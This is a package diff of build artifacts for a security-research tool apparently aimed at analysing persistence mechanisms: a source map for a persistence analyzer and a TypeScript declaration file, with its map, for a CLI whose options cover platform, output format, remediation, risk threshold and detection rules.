+{"version":3,"file":"persistence-analyzer.js","sourceRoot":"","sources":["../../src/security/persistence-analyzer.ts"],"names":[],"mappings":"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"}

package/dist/security/persistence-cli.d.ts

@@ -0,0 +1,36 @@
+#!/usr/bin/env node
+/**
+ * Persistence Research CLI
+ *
+ * Command-line interface for security research on persistence mechanisms
+ * across Windows, Linux, and cross-platform environments.
+ */
+interface CLIArguments {
+    platform?: string;
+    output?: 'text' | 'json' | 'csv';
+    includeRemediation?: boolean;
+    riskThreshold?: 'low' | 'medium' | 'high' | 'critical';
+    generateRules?: string[];
+    testCases?: boolean;
+    simulateDetection?: boolean;
+    assessment?: boolean;
+    help?: boolean;
+}
+declare class PersistenceCLI {
+    private analyzer;
+    constructor();
+    /**
+     * Parse command line arguments
+     */
+    parseArguments(args: string[]): CLIArguments;
+    /**
+     * Display help information
+     */
+    showHelp(): void;
+    /**
+     * Execute the CLI with provided arguments
+     */
+    execute(args: string[]): Promise<void>;
+}
+export { PersistenceCLI };
+//# sourceMappingURL=persistence-cli.d.ts.map

package/dist/security/persistence-cli.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"persistence-cli.d.ts","sourceRoot":"","sources":["../../src/security/persistence-cli.ts"],"names":[],"mappings":";AAEA;;;;;GAKG;AAIH,UAAU,YAAY;IACpB,QAAQ,CAAC,EAAE,MAAM,CAAC;IAClB,MAAM,CAAC,EAAE,MAAM,GAAG,MAAM,GAAG,KAAK,CAAC;IACjC,kBAAkB,CAAC,EAAE,OAAO,CAAC;IAC7B,aAAa,CAAC,EAAE,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAC;IACvD,aAAa,CAAC,EAAE,MAAM,EAAE,CAAC;IACzB,SAAS,CAAC,EAAE,OAAO,CAAC;IACpB,iBAAiB,CAAC,EAAE,OAAO,CAAC;IAC5B,UAAU,CAAC,EAAE,OAAO,CAAC;IACrB,IAAI,CAAC,EAAE,OAAO,CAAC;CAChB;AAED,cAAM,cAAc;IAClB,OAAO,CAAC,QAAQ,CAAsB;;IAMtC;;OAEG;IACH,cAAc,CAAC,IAAI,EAAE,MAAM,EAAE,GAAG,YAAY;IAiD5C;;OAEG;IACH,QAAQ,IAAI,IAAI;IAoChB;;OAEG;IACG,OAAO,CAAC,IAAI,EAAE,MAAM,EAAE,GAAG,OAAO,CAAC,IAAI,CAAC;CAuD7C;AAWD,OAAO,EAAE,cAAc,EAAE,CAAC"}